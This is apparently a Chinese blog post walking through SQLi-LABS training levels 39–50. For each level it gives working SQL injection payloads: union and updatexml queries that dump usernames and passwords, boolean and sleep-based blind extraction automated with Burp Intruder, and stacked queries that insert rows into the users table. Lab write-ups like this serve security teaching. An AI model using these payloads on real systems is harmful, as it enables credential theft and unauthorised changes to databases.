当前位置：首页 > news >正文

SQL注入SQLi-LABS 靶场less39-50详细通关攻略

news 2025/8/5 13:16:21

Less 39 GET -Stacked Query - Intiger based

一、判断注入方式

这一关主要考察为堆叠注入，格式：第一条语句;第二条语句这两条语句都是独立可执行的sql语句，所以我们试着往里面插入一些数据，验证可以进行sql注入和可以进行堆叠注入即可。

二、判断闭合方式

根据页面回显结果可以得到为证书注入。

1 and 1=1 --+
1 and 1=2 --+

三、查看详细信息

0 union select 1,2,group_concat(username,password) from users --+

四、堆叠注入插入数据

堆叠注入插入以下数据，使用id访问如果存在即为注入成功。（堆叠注入增删改查数据均可，需确保第二条语句是可以单独执行的完整句子）。

1; insert into users(id,username,password) values(21,'I','5') --+

Less 40 GET -BLIND based -String -Stacked

一、判断注入方式

这一关与上一关一样主要考察为堆叠注入，格式：第一条语句;第二条语句这两条语句都是独立可执行的sql语句，所以我们试着往里面插入一些数据，验证可以进行sql注入和可以进行堆叠注入即可。

二、判断闭合方式

1') and 1=1 --+
1') and 1=2 --+

三、查看详细信息

-1') union select 1,2,group_concat(username,password) from users --+

四、堆叠注入注入数据

1');insert into users(id,username,password) values(22,'Love','2') --+

Less 41 GET -Blind based -Intiger -Stacked

一、判断注入方式

这一关与上两关一样主要考察为堆叠注入，格式：第一条语句;第二条语句这两条语句都是独立可执行的sql语句，所以我们试着往里面插入一些数据，验证可以进行sql注入和可以进行堆叠注入即可。题目还有一个敏感性不过博主属实没有看出来敏感在哪了。

二、判断闭合方式

1 and 1=1 --+
1 and 1=2 --+

三、查看详细信息

-1 union select 1,2,group_concat(username,password) from users --+

四、堆叠注入插入数据

1;insert into users(id,username,password) values(23,'you','1') --+

Less 42 POST -Error based -String -Stacked

一、判断注入方式

看这个界面其实可以使用二次注入的，但是题目给的是基于错误的堆叠注入还是POST型的，所以我们还是简单的使用报错注入获取全部信息然后堆叠注入插入数据进行登录吧。

二、判断闭合方式

POST没必要判断了，直接抓包更改数据就OK了。

三、查看详细信息

这里的注入点是密码框不是用户框注意插入位置。

'and updatexml(1,concat(1,(select group_concat(username,password) from users )),3) --+

四、使用堆叠注入插入数据

1';insert into users(id,username,password) values(99,'L','T') --+

less 43 POST -Error based -String -Stacked -with twist

该关卡与42关除闭合方式不一样外其他一模一样，博主这里仅给出代码，各位去努力吧。

') --+ //闭合方式
'and updatexml(1,concat(1,(select group_concat(username,password) from users )),3) --+		//查看详细信息
1';insert into users(id,username,password) values(66,'L','TT') --+			//堆叠注入插入数据,执行命令后进行登录即可

less 44 POST -Error based -String -Stacked -Blind

一、判断注入方式

POST 传参使用BP抓包发送到重放器构造语句进行注入判断。正确正常，错误没有任何回显使用布尔盲注进行注入得到信息，堆叠注入插入信息后登录尝试验证。

二、判断闭合方式

用户名为正确的前提下使用密码往后加符号尝试。

T' and 1=2 --+
T' and 1=1 --+

三、构造语句得数据库名

'or substr(database(),1,1)='s' --+

手动过慢使用BP的intruder模块。

根据响应包长度排序就可以得到数据库名称。

、

四、构造语句得数据表名称

同上面相同做法，使用语句后发送到intruder模块

'or substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1)='s' --+

发送攻击模块将第三个1和s设为变量，开始攻击即可。查询第二个字段将第一个1改为2即可。

五、构造语句查看字段名

'or substr((select column_name from information_schema.columns where table_schema='security' and table_name = users limit 1,1),1,1)='s' --+

其他均与上一步相同

六、查看详细信息

'or substr((select username from users limit 1,1),1,1)='s' --+
'or substr((select password from users limit 1,1),1,1)='s' --+

七、堆叠注入

1';insert into users(id,username,password) values(88,'LT','T') --+

执行命令后使用用户密码登录验证即可。

Less 45 POST -Error based -String Stacked -Blind

本关卡与上一关除闭合方式改为 ') --+ 外其他均相同，就不赘述了。

Less 46 GET -Error based Numeric -ORDER BY CLAUSE

一、判断注入方式

页面提示使用的是sort参数，输入不同的数值按不同的列数进行排序，应该使用的是order by 相关的东西，使用报错注入。

二、判断闭合方式

闭合方式这里影响不大，但是根据报错的提示可以判断为数字型。

三、构造语句得数据库名

1 and updatexml(1,concat(1,database()),3) --+

四、构造语句得数据表名称

1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),3) --+

五、构造语句查看字段名

1 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273)),3) --+

六、查看详细信息

1 and updatexml(1,concat(1,(select group_concat(username,password) from users)),3) --+

less 47 GET -Error based -String -ORDER BY CLAUSE

该关卡与上一关卡一样啊，就是改变数字没啥反应，所以前面的数字给改为负数或0即可。

一、构造语句得数据库名

0' and updatexml(1,concat(1,database()),3) --+

二、构造语句得数据表名称

-1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),3) --+

三、构造语句查看字段名

-1' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273)),3) --+

四、查看详细信息

-1' and updatexml(1,concat(1,(select group_concat(username,password) from users)),3) --+

Less 48 GET Error based -Blind -Numeric -ORDER BY CLAUSE

一、注入方式

对的时候存在回显，错的时候没有任何的回显信息，使用时间盲注。

二、获取数据库名

抓包后放到攻击模块进行爆破，因为sleep超时所以出不来结果的就是正确值，下几条命令同理。

1 and if((substr(database(),1,1))='s',sleep(5),1)

三、获取数据表名

1 and  if(substr((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1)='s',sleep(4),1)

四、获取数据字段名

1 and if(substr((select column_name from information_schema.columns where table_schema='security' and table_name = users limit 1,1),1,1)='s',sleep(4),1)

五、获取数据信息

获取用户名和密码时更改第一个1即可。

1 and if(substr((select username from users limit 1,1),1,1)='s',sleep(4),1) 
1 and if(substr((select password from users limit 1,1),1,1)='s',sleep(4),1)

Less 49 GET Error based -Blind -ORDER BY CLAUSE

这一关跟上一关除闭合方式改为 ') 外，没有任何区别。不做赘述了。

Less 50 GET Error based -ORDER BY CLAUSE -numeric -Stacked injection

一、注入方式判断

根据报错信息提示可以使用报错注入，题目也考堆叠，所以俩都用一下吧。

二、闭合方式

单引号双引号加括号都没有用，全都是报错应该就是数字型了，查看源代码也确实是数字型的。

三、查找数据库

0 and updatexml(1,concat(1,database()),3) --+

四、查询数据表

-1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),3) --+

五、查询数据字段名

-1 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273)),3) --+

六、查询数据信息

-1' and updatexml(1,concat(1,(select group_concat(username,password) from users)),3) --+

七、堆叠注入

1;insert into users(id,username,password) values(88,'LT','T') --+

查看全文

http://www.xdnf.cn/news/1242469.html

基于实时音视频技术的远程控制传输SDK的功能设计

【ECCV2024】AdaCLIP:基于混合可学习提示适配 CLIP 的零样本异常检测

[GESP202306 四级] 2023年6月GESP C++四级上机题超详细题解，附带讲解视频！

刷题记录0804

ref和reactive的区别

8位以及32位的MCU如何进行选择？

ArrayDeque双端队列--底层原理可视化

Redis 常用数据结构以及单线程模型

LeetCode 140：单词拆分 II

Array容器学习

app-1

优选算法力扣 11. 盛最多水的容器双指针降低时间复杂度贪心策略 C++题解每日一题

Javascript面试题及详细答案150道之（031-045）

【多智能体cooragent】CoorAgent 系统中 5 个核心系统组件分析

一起学springAI系列一：流式返回

【实战】Dify从0到100进阶--中药科普助手（1）

嵌入式硬件中三极管原理分析与控制详解

零售消费行业研究系列报告

微帧GPU视频硬编优化引擎：面向人工智能大时代的AI算法与硬编协同优化方案

[特殊字符]️ 整个键盘控制无人机系统框架

【AI 加持下的 Python 编程实战 2_13】第九章：繁琐任务的自动化（中）——自动批量合并 PDF 文档

【银河麒麟服务器系统】自定义ISO镜像更新内核版本

数据结构---配置网络步骤、单向链表额外应用

从物理扇区到路径访问：Linux文件抽象的全景解析

深入剖析RT-Thread串口驱动：基于STM32H750的FinSH Shell全链路Trace分析与实战解密(上)

Less 39 GET -Stacked Query - Intiger based

一、判断注入方式

二、判断闭合方式

三、查看详细信息

四、堆叠注入插入数据

Less 40 GET -BLIND based -String -Stacked

一、判断注入方式

二、判断闭合方式

三、查看详细信息

四、堆叠注入注入数据

Less 41 GET -Blind based -Intiger -Stacked

一、判断注入方式

二、判断闭合方式

三、查看详细信息

四、堆叠注入插入数据

Less 42 POST -Error based -String -Stacked

一、判断注入方式

二、判断闭合方式

三、查看详细信息

四、使用堆叠注入插入数据

less 43 POST -Error based -String -Stacked -with twist

less 44 POST -Error based -String -Stacked -Blind

一、判断注入方式

二、判断闭合方式

三、构造语句得数据库名

四、构造语句得数据表名称

五、构造语句查看字段名

六、查看详细信息

七、堆叠注入

Less 45 POST -Error based -String Stacked -Blind

Less 46 GET -Error based Numeric -ORDER BY CLAUSE

一、判断注入方式

二、判断闭合方式

三、构造语句得数据库名

四、构造语句得数据表名称

五、构造语句查看字段名

六、查看详细信息

less 47 GET -Error based -String -ORDER BY CLAUSE

一、构造语句得数据库名

二、构造语句得数据表名称

三、构造语句查看字段名

四、查看详细信息

Less 48 GET Error based -Blind -Numeric -ORDER BY CLAUSE

一、注入方式

二、获取数据库名

三、获取数据表名

四、获取数据字段名

五、获取数据信息

Less 49 GET Error based -Blind -ORDER BY CLAUSE

Less 50 GET Error based -ORDER BY CLAUSE -numeric -Stacked injection

一、注入方式判断

二、闭合方式

三、查找数据库

四、查询数据表

五、查询数据字段名

六、查询数据信息

七、堆叠注入

相关文章：